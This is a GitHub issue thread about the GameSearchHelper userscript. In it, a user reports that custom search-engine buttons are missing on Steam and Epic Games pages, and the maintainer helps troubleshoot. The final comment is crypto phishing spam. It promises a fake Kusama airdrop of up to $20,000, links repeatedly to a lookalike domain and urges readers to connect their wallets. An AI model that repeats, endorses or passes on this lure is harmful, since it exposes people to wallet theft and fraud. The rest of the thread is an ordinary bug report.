### ISSUE TITLE
Missing button

### ISSUE THREAD

**Issue by zzzqh** [xdpirate/GameSearchHelper#1]
Added the following Custom search engines to GSH.

Green Man Gaming
Google Play
Humble Store
and so on

Confirm and check in GSH menu, but none of these engines are visible on SteamGame pages.
However, they are both visible on GogGame pages.
Also, no button is visible on EpicGame pages, including buttons from Built-in search engines.

**Comment by xdpirate** [comment]
Hey, can you try to click the save button an additional time while you're on the pages that don't work (steam)? I will have a look at the epic games store pages, they might have been updated since I worked on this last.

**Comment by zzzqh** [comment]
Yes, I tried to click the save button, and the website (steam) reflash automatically, But missing button is still invisible. 

After that, I try to reinstall GSH And found the buttons can be added correctly. But after deleting one button and first saving it, if I try to add a new Custom search engine, the missing appears again.

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)
